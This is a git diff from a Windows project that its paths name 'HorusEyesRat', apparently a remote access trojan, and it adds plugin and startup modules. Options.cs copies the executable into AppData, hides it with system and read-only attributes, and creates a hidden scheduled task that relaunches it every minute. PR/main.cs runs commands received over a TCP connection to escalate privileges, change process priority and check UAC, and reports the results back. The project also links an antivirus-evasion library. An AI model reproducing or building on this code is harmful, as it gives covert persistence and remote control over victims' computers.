9bd2a9f..8d1bc35 100644 --- a/NW/NW.vbproj +++ b/NW/NW.vbproj @@ -30,7 +30,7 @@ false true true - bin\Release\ + ..\Server\bin\Release\Plugins\ NW.xml 42016,41999,42017,42018,42019,42032,42036,42020,42021,42022 @@ -60,7 +60,7 @@ - + diff --git a/NW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/NW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/NW/obj/Debug/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/NW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/NW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/NW/obj/Debug/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/NW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache b/NW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache index e64d93e..da6689f 100644 Binary files a/NW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache and b/NW/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/NW/obj/Debug/NW.dll b/NW/obj/Debug/NW.dll index 8227b00..fde0254 100644 Binary files a/NW/obj/Debug/NW.dll and b/NW/obj/Debug/NW.dll differ diff --git a/NW/obj/Debug/NW.pdb b/NW/obj/Debug/NW.pdb index d12b996..4d04ee2 100644 Binary files a/NW/obj/Debug/NW.pdb and b/NW/obj/Debug/NW.pdb differ diff --git a/NW/obj/Debug/NW.vbproj.CoreCompileInputs.cache b/NW/obj/Debug/NW.vbproj.CoreCompileInputs.cache index 0f2cd94..bf7babe 100644 --- a/NW/obj/Debug/NW.vbproj.CoreCompileInputs.cache +++ b/NW/obj/Debug/NW.vbproj.CoreCompileInputs.cache @@ -1 +1 @@ -24451db3c270d182354e38f9877b0d84ab23e0ff +1167e6e4d9cfaa64453698fc09b398eacda12bc4 diff --git a/NW/obj/Debug/NW.vbproj.FileListAbsolute.txt b/NW/obj/Debug/NW.vbproj.FileListAbsolute.txt index b805e5d..dd909d9 100644 --- a/NW/obj/Debug/NW.vbproj.FileListAbsolute.txt +++ b/NW/obj/Debug/NW.vbproj.FileListAbsolute.txt @@ -35,3 +35,16 @@ C:\Users\mehdi\Documents\HorusEyesRat-main\NW\obj\Debug\NW.vbproj.Fody.CopyLocal C:\Users\mehdi\Documents\HorusEyesRat-main\NW\obj\Debug\NW.dll C:\Users\mehdi\Documents\HorusEyesRat-main\NW\obj\Debug\NW.xml C:\Users\mehdi\Documents\HorusEyesRat-main\NW\obj\Debug\NW.pdb +Z:\HorusEyesRat-master\NW\bin\Debug\NW.dll +Z:\HorusEyesRat-master\NW\bin\Debug\NW.pdb +Z:\HorusEyesRat-master\NW\bin\Debug\NW.xml +Z:\HorusEyesRat-master\NW\bin\Debug\PacketLib.xml +Z:\HorusEyesRat-master\NW\obj\Debug\NW.vbprojAssemblyReference.cache +Z:\HorusEyesRat-master\NW\obj\Debug\PL.Resources.resources +Z:\HorusEyesRat-master\NW\obj\Debug\NW.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\NW\obj\Debug\NW.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\NW\obj\Debug\NW.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\NW\obj\Debug\NW.vbproj.CopyComplete +Z:\HorusEyesRat-master\NW\obj\Debug\NW.dll +Z:\HorusEyesRat-master\NW\obj\Debug\NW.xml +Z:\HorusEyesRat-master\NW\obj\Debug\NW.pdb diff --git a/NW/obj/Debug/NW.vbproj.Fody.CopyLocal.cache b/NW/obj/Debug/NW.vbproj.Fody.CopyLocal.cache index e69de29..c1cd591 100644 --- a/NW/obj/Debug/NW.vbproj.Fody.CopyLocal.cache +++ b/NW/obj/Debug/NW.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/NW/obj/Debug/NW.vbproj.GenerateResource.cache b/NW/obj/Debug/NW.vbproj.GenerateResource.cache index ae4d4aa..0b103ff 100644 Binary files a/NW/obj/Debug/NW.vbproj.GenerateResource.cache and b/NW/obj/Debug/NW.vbproj.GenerateResource.cache differ diff --git a/NW/obj/Debug/NW.vbprojAssemblyReference.cache b/NW/obj/Debug/NW.vbprojAssemblyReference.cache index 812558f..6bf8649 100644 Binary files a/NW/obj/Debug/NW.vbprojAssemblyReference.cache and b/NW/obj/Debug/NW.vbprojAssemblyReference.cache differ diff --git a/NW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll b/NW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..9f974a9 Binary files /dev/null and b/NW/obj/Debug/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/NW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll b/NW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..9713c52 Binary files /dev/null and b/NW/obj/Debug/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/NW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb b/NW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb new file mode 100644 index 0000000..e7dcac5 --- /dev/null +++ b/NW/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.vb @@ -0,0 +1,7 @@ +' + Option Strict Off + Option Explicit On + + Imports System + Imports System.Reflection + diff --git a/NW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/NW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/NW/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/NW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed b/NW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed new file mode 100644 index 0000000..60cb1ab Binary files /dev/null and b/NW/obj/Release/Costura/746C6F9E511F3138300F360DB08C5C10D0785D0F.costura.packetlib.dll.compressed differ diff --git a/NW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed b/NW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..650889f Binary files /dev/null and b/NW/obj/Release/Costura/88E47D90D32A3913E2B9F3259197A5068A93482F.costura.packetlib.pdb.compressed differ diff --git a/NW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/NW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..853388a Binary files /dev/null and b/NW/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/NW/obj/Release/NW.dll b/NW/obj/Release/NW.dll new file mode 100644 index 0000000..856963a Binary files /dev/null and b/NW/obj/Release/NW.dll differ diff --git a/NW/obj/Release/NW.pdb b/NW/obj/Release/NW.pdb new file mode 100644 index 0000000..b6c3774 Binary files /dev/null and b/NW/obj/Release/NW.pdb differ diff --git a/NW/obj/Release/NW.vbproj.CopyComplete b/NW/obj/Release/NW.vbproj.CopyComplete new file mode 100644 index 0000000..e69de29 diff --git a/NW/obj/Release/NW.vbproj.CoreCompileInputs.cache b/NW/obj/Release/NW.vbproj.CoreCompileInputs.cache new file mode 100644 index 0000000..15c13c2 --- /dev/null +++ b/NW/obj/Release/NW.vbproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +660e3872eb3d0efffce2f059955f121dbd3974b8 diff --git a/NW/obj/Release/NW.vbproj.FileListAbsolute.txt b/NW/obj/Release/NW.vbproj.FileListAbsolute.txt new file mode 100644 index 0000000..40b747b --- /dev/null +++ b/NW/obj/Release/NW.vbproj.FileListAbsolute.txt @@ -0,0 +1,19 @@ +Z:\HorusEyesRat-master\NW\bin\Release\NW.dll +Z:\HorusEyesRat-master\NW\bin\Release\NW.pdb +Z:\HorusEyesRat-master\NW\bin\Release\NW.xml +Z:\HorusEyesRat-master\NW\bin\Release\PacketLib.xml +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\NW.dll +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\NW.pdb +Z:\HorusEyesRat-master\HorusEyesRat-master\Server\bin\Release\Plugins\NW.xml +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\NW.dll +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\NW.pdb +Z:\HorusEyesRat-master\Server\bin\Release\Plugins\NW.xml +Z:\HorusEyesRat-master\NW\obj\Release\PL.Resources.resources +Z:\HorusEyesRat-master\NW\obj\Release\NW.vbproj.GenerateResource.cache +Z:\HorusEyesRat-master\NW\obj\Release\NW.vbproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\NW\obj\Release\NW.vbproj.Fody.CopyLocal.cache +Z:\HorusEyesRat-master\NW\obj\Release\NW.vbproj.CopyComplete +Z:\HorusEyesRat-master\NW\obj\Release\NW.dll +Z:\HorusEyesRat-master\NW\obj\Release\NW.xml +Z:\HorusEyesRat-master\NW\obj\Release\NW.pdb +Z:\HorusEyesRat-master\NW\obj\Release\NW.vbprojAssemblyReference.cache diff --git a/NW/obj/Release/NW.vbproj.Fody.CopyLocal.cache b/NW/obj/Release/NW.vbproj.Fody.CopyLocal.cache new file mode 100644 index 0000000..c1cd591 --- /dev/null +++ b/NW/obj/Release/NW.vbproj.Fody.CopyLocal.cache @@ -0,0 +1 @@ +Z:\HorusEyesRat-master\PacketLib\bin\Debug\PacketLib.xml diff --git a/NW/obj/Release/NW.vbproj.GenerateResource.cache b/NW/obj/Release/NW.vbproj.GenerateResource.cache new file mode 100644 index 0000000..c9ae5e6 Binary files /dev/null and b/NW/obj/Release/NW.vbproj.GenerateResource.cache differ diff --git a/NW/obj/Release/NW.vbprojAssemblyReference.cache b/NW/obj/Release/NW.vbprojAssemblyReference.cache new file mode 100644 index 0000000..0b400ca Binary files /dev/null and b/NW/obj/Release/NW.vbprojAssemblyReference.cache differ diff --git a/NW/obj/Release/NW.xml b/NW/obj/Release/NW.xml new file mode 100644 index 0000000..9870876 --- /dev/null +++ b/NW/obj/Release/NW.xml @@ -0,0 +1,26 @@ + + + + +NW + + + + + + Une classe de ressource fortement typée destinée, entre autres, à la consultation des chaînes localisées. + + + + + Retourne l'instance ResourceManager mise en cache utilisée par cette classe. + + + + + Remplace la propriété CurrentUICulture du thread actuel pour toutes + les recherches de ressources à l'aide de cette classe de ressource fortement typée. + + + + diff --git a/NW/obj/Release/PL.Resources.resources b/NW/obj/Release/PL.Resources.resources new file mode 100644 index 0000000..6c05a97 Binary files /dev/null and b/NW/obj/Release/PL.Resources.resources differ diff --git a/NW/obj/Release/TempPE/My Project.Application.Designer.vb.dll b/NW/obj/Release/TempPE/My Project.Application.Designer.vb.dll new file mode 100644 index 0000000..0612ba9 Binary files /dev/null and b/NW/obj/Release/TempPE/My Project.Application.Designer.vb.dll differ diff --git a/NW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll b/NW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll new file mode 100644 index 0000000..1462807 Binary files /dev/null and b/NW/obj/Release/TempPE/My Project.Resources.Designer.vb.dll differ diff --git a/Options/NativeHelpers.cs b/Options/NativeHelpers.cs new file mode 100644 index 0000000..ceb1211 --- /dev/null +++ b/Options/NativeHelpers.cs @@ -0,0 +1,25 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Runtime.InteropServices; +using System.Text; +using System.Threading.Tasks; + +namespace Options +{ + public class NativeHelpers + { + [DllImport("kernel32.dll")] + public static extern bool SetFileAttributes(string lpFileName, FileAttributes dwFileAttributes); + //SetFileAttributes + + [Flags] + public enum FileAttributes : uint + { + Readonly = 0x00000001, + Hidden = 0x00000002, + System = 0x00000004, + } + + } +} diff --git a/Options/Options.cs b/Options/Options.cs new file mode 100644 index 0000000..d92ec73 --- /dev/null +++ b/Options/Options.cs @@ -0,0 +1,117 @@ +using IWshRuntimeLibrary; +using Microsoft.VisualBasic; +using System; +using System.Diagnostics; +using System.Runtime.InteropServices; +using System.Threading; +using System.Windows.Forms; + + +namespace Options +{ + public class Options + { + internal static string ProgramPath = Application.ExecutablePath; + internal static string ExecName = System.AppDomain.CurrentDomain.FriendlyName; + internal static string TaskName; + internal static Mutex MT; + internal static string MUTEX = "56d45qs4f-*(§/è'(q23fqdswcxv"; + internal static bool OW = false; + + public Options(string taskName) + { + TaskName = taskName; + } + public Options() + { + TaskName = "Client"; + } + public static void StartUp(string d_time = "1") + { + + + try + { + + + string newPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\" + ExecName; + + if (System.IO.File.Exists(newPath) ==false) + { + + + System.IO.File.WriteAllBytes(newPath, System.IO.File.ReadAllBytes(ProgramPath)); + + NativeHelpers.SetFileAttributes(newPath, NativeHelpers.FileAttributes.Hidden | NativeHelpers.FileAttributes.System | NativeHelpers.FileAttributes.Readonly); + + + /* + + var shell = new IWshShell_Class(); + + + IWshShortcut shortcut = (IWshShortcut)shell.CreateShortcut(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + ExecName.Replace(".exe" , ".lnk")); + + + shortcut.TargetPath = newPath; + + + shortcut.Description = ""; + + + shortcut.Save(); + */ + + //string ShellCMD2 = "schtasks /create /sc onstart /tn \"||\" /tr \"" + newPath + "\""; + + + + //Interaction.Shell(ShellCMD2.Replace("||", TaskName + "CC").Replace("1", d_time), AppWinStyle.Hide, false, -1); + } + + string ShellCMD = "schtasks /create /sc minute /mo 1 /tn \"||\" /tr \"" + newPath + "\""; + + + Interaction.Shell(ShellCMD.Replace("||", TaskName).Replace("1", d_time), AppWinStyle.Hide, false, -1); + + } + catch (Exception ex) + { + + } + } + public static void oneInstance() + { + MT = new Mutex(true, MUTEX,out OW); + if(!OW) + { + NtTerminateProcess(Process.GetCurrentProcess().Handle, 0); + + } + } + public static void U_StartUp() + { + try + { + string newPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\" + ExecName; + + string ShellCMD = "schtasks /delete /tn " + TaskName + " /f"; + + Interaction.Shell(ShellCMD, AppWinStyle.Hide, false, -1); + + NtTerminateProcess(Process.GetCurrentProcess().Handle, 0); + + } + catch(Exception ex) + { + MessageBox.Show(ex.ToString()); + } + + } + + [DllImport("ntdll.dll", SetLastError = true)] + static extern uint NtTerminateProcess(IntPtr hProcess, int errorStatus); + } + +} + diff --git a/Options/Options.csproj b/Options/Options.csproj new file mode 100644 index 0000000..372c1be --- /dev/null +++ b/Options/Options.csproj @@ -0,0 +1,62 @@ + + + + + Debug + AnyCPU + {B449A7EC-0DB2-4547-96DB-975F81161D3C} + Library + Properties + Options + Options + v4.8 + 512 + true + + + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + + + + + + + + + + + + + + + + + + + {F935DC20-1CF0-11D0-ADB9-00C04FD58A0B} + 1 + 0 + 0 + tlbimp + False + True + + + + \ No newline at end of file diff --git a/Options/Properties/AssemblyInfo.cs b/Options/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..a2351b9 --- /dev/null +++ b/Options/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// Les informations générales relatives à un assembly dépendent de +// l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations +// associées à un assembly. +[assembly: AssemblyTitle("Options")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("Options")] +[assembly: AssemblyCopyright("Copyright © 2021")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// L'affectation de la valeur false à ComVisible rend les types invisibles dans cet assembly +// aux composants COM. Si vous devez accéder à un type dans cet assembly à partir de +// COM, affectez la valeur true à l'attribut ComVisible sur ce type. +[assembly: ComVisible(false)] + +// Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM +[assembly: Guid("b449a7ec-0db2-4547-96db-975f81161d3c")] + +// Les informations de version pour un assembly se composent des quatre valeurs suivantes : +// +// Version principale +// Version secondaire +// Numéro de build +// Révision +// +// Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut +// en utilisant '*', comme indiqué ci-dessous : +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/Options/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs b/Options/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs new file mode 100644 index 0000000..15efebf --- /dev/null +++ b/Options/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] diff --git a/Options/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache b/Options/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache new file mode 100644 index 0000000..be46f46 Binary files /dev/null and b/Options/obj/Release/DesignTimeResolveAssemblyReferencesInput.cache differ diff --git a/Options/obj/Release/Interop.IWshRuntimeLibrary.dll b/Options/obj/Release/Interop.IWshRuntimeLibrary.dll new file mode 100644 index 0000000..9b33d18 Binary files /dev/null and b/Options/obj/Release/Interop.IWshRuntimeLibrary.dll differ diff --git a/Options/obj/Release/Options.csproj.CoreCompileInputs.cache b/Options/obj/Release/Options.csproj.CoreCompileInputs.cache new file mode 100644 index 0000000..650adaf --- /dev/null +++ b/Options/obj/Release/Options.csproj.CoreCompileInputs.cache @@ -0,0 +1 @@ +ee7037d49cd6db12f78e7c6a167045783ca0e207 diff --git a/Options/obj/Release/Options.csproj.FileListAbsolute.txt b/Options/obj/Release/Options.csproj.FileListAbsolute.txt new file mode 100644 index 0000000..237055b --- /dev/null +++ b/Options/obj/Release/Options.csproj.FileListAbsolute.txt @@ -0,0 +1,8 @@ +Z:\HorusEyesRat-master\Options\bin\Release\Options.dll +Z:\HorusEyesRat-master\Options\bin\Release\Options.pdb +Z:\HorusEyesRat-master\Options\obj\Release\Options.csproj.CoreCompileInputs.cache +Z:\HorusEyesRat-master\Options\obj\Release\Options.dll +Z:\HorusEyesRat-master\Options\obj\Release\Options.pdb +Z:\HorusEyesRat-master\Options\obj\Release\Interop.IWshRuntimeLibrary.dll +Z:\HorusEyesRat-master\Options\obj\Release\Options.csproj.ResolveComReference.cache +Z:\HorusEyesRat-master\Options\obj\Release\Options.csprojAssemblyReference.cache diff --git a/Options/obj/Release/Options.csproj.ResolveComReference.cache b/Options/obj/Release/Options.csproj.ResolveComReference.cache new file mode 100644 index 0000000..0dd2371 Binary files /dev/null and b/Options/obj/Release/Options.csproj.ResolveComReference.cache differ diff --git a/Options/obj/Release/Options.csprojAssemblyReference.cache b/Options/obj/Release/Options.csprojAssemblyReference.cache new file mode 100644 index 0000000..91a6f57 Binary files /dev/null and b/Options/obj/Release/Options.csprojAssemblyReference.cache differ diff --git a/Options/obj/Release/Options.dll b/Options/obj/Release/Options.dll new file mode 100644 index 0000000..a8174a3 Binary files /dev/null and b/Options/obj/Release/Options.dll differ diff --git a/Options/obj/Release/Options.pdb b/Options/obj/Release/Options.pdb new file mode 100644 index 0000000..ab4e945 Binary files /dev/null and b/Options/obj/Release/Options.pdb differ diff --git a/PR/FodyWeavers.xml b/PR/FodyWeavers.xml new file mode 100644 index 0000000..5029e70 --- /dev/null +++ b/PR/FodyWeavers.xml @@ -0,0 +1,3 @@ + + + \ No newline at end of file diff --git a/PR/FodyWeavers.xsd b/PR/FodyWeavers.xsd new file mode 100644 index 0000000..44a5374 --- /dev/null +++ b/PR/FodyWeavers.xsd @@ -0,0 +1,111 @@ + + + + + + + + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with line breaks. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with line breaks. + + + + + The order of preloaded assemblies, delimited with line breaks. + + + + + + This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file. + + + + + Controls if .pdbs for reference assemblies are also embedded. + + + + + Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option. + + + + + As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off. + + + + + Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code. + + + + + Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior. + + + + + A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with | + + + + + A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |. + + + + + A list of unmanaged 32 bit assembly names to include, delimited with |. + + + + + A list of unmanaged 64 bit assembly names to include, delimited with |. + + + + + The order of preloaded assemblies, delimited with |. + + + + + + + + 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed. + + + + + A comma-separated list of error codes that can be safely ignored in assembly verification. + + + + + 'false' to turn off automatic generation of the XML Schema file. + + + + + \ No newline at end of file diff --git a/PR/PR.csproj b/PR/PR.csproj new file mode 100644 index 0000000..d12662e --- /dev/null +++ b/PR/PR.csproj @@ -0,0 +1,73 @@ + + + + + + Debug + AnyCPU + {EB2AD5DB-5A5F-472B-854A-DC377A7F3288} + Library + Properties + PL + PR + v4.8 + 512 + true + + + + + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + pdbonly + true + ..\Server\bin\Release\Plugins\ + TRACE + prompt + 4 + true + + + + ..\packages\Costura.Fody.4.1.0\lib\net40\Costura.dll + + + F:\Personal\C#\AV_Evasion_Tool-3.0\AV_Evasion_Tool-3.0\Native\bin\Debug\Native.dll + + + ..\PacketLib\bin\Release\PacketLib.dll + + + + + + + + + + + + + + + + + + + + + + + Ce projet fait référence à des packages NuGet qui sont manquants sur cet ordinateur. Utilisez l'option de restauration des packages NuGet pour les télécharger. Pour plus d'informations, consultez http://go.microsoft.com/fwlink/?LinkID=322105. Le fichier manquant est : {0}. + + + + + \ No newline at end of file diff --git a/PR/Properties/AssemblyInfo.cs b/PR/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..206af6c --- /dev/null +++ b/PR/Properties/AssemblyInfo.cs @@ -0,0 +1,36 @@ +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; + +// Les informations générales relatives à un assembly dépendent de +// l'ensemble d'attributs suivant. Changez les valeurs de ces attributs pour modifier les informations +// associées à un assembly. +[assembly: AssemblyTitle("PR")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("PR")] +[assembly: AssemblyCopyright("Copyright © 2021")] +[assembly: AssemblyTrademark("")] +[assembly: AssemblyCulture("")] + +// L'affectation de la valeur false à ComVisible rend les types invisibles dans cet assembly +// aux composants COM. Si vous devez accéder à un type dans cet assembly à partir de +// COM, affectez la valeur true à l'attribut ComVisible sur ce type. +[assembly: ComVisible(false)] + +// Le GUID suivant est pour l'ID de la typelib si ce projet est exposé à COM +[assembly: Guid("eb2ad5db-5a5f-472b-854a-dc377a7f3288")] + +// Les informations de version pour un assembly se composent des quatre valeurs suivantes : +// +// Version principale +// Version secondaire +// Numéro de build +// Révision +// +// Vous pouvez spécifier toutes les valeurs ou indiquer les numéros de build et de révision par défaut +// en utilisant '*', comme indiqué ci-dessous : +// [assembly: AssemblyVersion("1.0.*")] +[assembly: AssemblyVersion("1.0.0.0")] +[assembly: AssemblyFileVersion("1.0.0.0")] diff --git a/PR/main.cs b/PR/main.cs new file mode 100644 index 0000000..6d44ab0 --- /dev/null +++ b/PR/main.cs @@ -0,0 +1,92 @@ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Net.Sockets; +using System.Text; +using System.Threading.Tasks; +using System.Windows.Forms; +using static Native.NtDll; +using static PacketLib.Packet; + +namespace PL +{ + public class Main + { + public static PacketMaker P = new PacketMaker(); + public static Packet_Send Send = new Packet_Send(); + public unsafe static void main(TcpClient K, object[] Param_Tab) + { + + Packet_Subject TypeSub = (Packet_Subject)Param_Tab[0]; + + switch (TypeSub) + { + case Packet_Subject.GET_PRIV: + + try + { + Native.NtDll.Enumerations._PRIVILEGES ToGet = (Native.NtDll.Enumerations._PRIVILEGES)Param_Tab[1]; + bool t1; + NTSTATUS GetPriv = Native.NtDll.Functions.RtlAdjustPrivilege(ToGet, true, false, out t1); + P.Type_Packet = PacketType.PLUGIN_CS_RES; + P.Misc = new object[] { Packet_Subject.GET_PRIV, GetPriv, ToGet }; + Send.Packet = P; + + lock (K) + { + Send.Send(K.GetStream()); + } + } + catch (Exception ex) + { + // MessageBox.Show(ex.ToString()); + } + + break; + + case Packet_Subject.GET_PRIO: + + IntPtr SizeOfData = (IntPtr)0x002; + int nLsength = 0; + void* DataPointer = (void*)0; + NTSTATUS Stat = Functions.NtQueryInformationProcess(System.Diagnostics.Process.GetCurrentProcess().Handle, Enumerations._PROCESS_INFO_CLASS.ProcessPriorityClass, ref DataPointer, SizeOfData, out nLsength); + P.Type_Packet = PacketType.PLUGIN_CS_RES; + P.Misc = new object[] { Packet_Subject.GET_PRIO, (Enumerations._PRIORITY_CLASS)((uint)DataPointer)}; + Send.Packet = P; + { + Send.Send(K.GetStream()); + } + break; + + case Packet_Subject.SET_PRIO: + + Native.NtDll.Enumerations._PRIORITY_CLASS ToSet = (Native.NtDll.Enumerations._PRIORITY_CLASS)Param_Tab[1]; + NTSTATUS SetPrio = Functions.NtSetInformationProcess(System.Diagnostics.Process.GetCurrentProcess().Handle, Enumerations._PROCESS_INFO_CLASS.ProcessPriorityClass, (IntPtr)ToSet, (IntPtr)0x002); + P.Type_Packet = PacketType.PLUGIN_CS_RES; + P.Misc = new object[] { Packet_Subject.SET_PRIO, SetPrio}; + Send.Packet = P; + lock (K) + { + Send.Send(K.GetStream()); + } + break; + + case Packet_Subject.CHECK_UAC: + uint p = 0; + NTSTATUS ChckUAC = Functions.RtlQueryElevationFlags(&p); + Enumerations.RtlQueryElevation_Flags Flags = (Enumerations.RtlQueryElevation_Flags)p; + P.Type_Packet = PacketType.PLUGIN_CS_RES; + P.Misc = new object[] { Packet_Subject.CHECK_UAC, Flags , p}; + Send.Packet = P; + lock (K) + { + Send.Send(K.GetStream()); + } + break; + } + + + + } + } +} diff --git a/PR/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs b/PR/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs new file mode 100644 index 0000000..15efebf --- /dev/null +++ b/PR/obj/Release/.NETFramework,Version=v4.8.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.8", FrameworkDisplayName = ".NET Framework 4.8")] diff --git a/PR/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed b/PR/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..c113eae Binary files /dev/null and b/PR/obj/Release/Costura/2B0F11B255FDBF048B7FF6DA71739EF0420A451C.costura.packetlib.pdb.compressed differ diff --git a/PR/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed b/PR/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed new file mode 100644 index 0000000..d9fe526 Binary files /dev/null and b/PR/obj/Release/Costura/5954E332EC7732BA34C27E2D88D154D1919C1B07.costura.costura.dll.compressed differ diff --git a/PR/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed b/PR/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed new file mode 100644 index 0000000..b30cb5b Binary files /dev/null and b/PR/obj/Release/Costura/756C93AEDB031F3A1D5D91E385254001BD513192.costura.packetlib.dll.compressed differ diff --git a/PR/obj/Release/Costura/85F1453C97B11C4B526B8677CD97C0D03127C9AA.costura.native.dll.compressed b/PR/obj/Release/Costura/85F1453C97B11C4B526B8677CD97C0D03127C9AA.costura.native.dll.compressed new file mode 100644 index 0000000..5130fac Binary files /dev/null and b/PR/obj/Release/Costura/85F1453C97B11C4B526B8677CD97C0D03127C9AA.costura.native.dll.compressed differ diff --git a/PR/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed b/PR/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed new file mode 100644 index 0000000..5f08bb9 Binary files /dev/null and b/PR/obj/Release/Costura/8D78352A4074830675E9A475E138337C4B9676EC.costura.packetlib.pdb.compressed differ 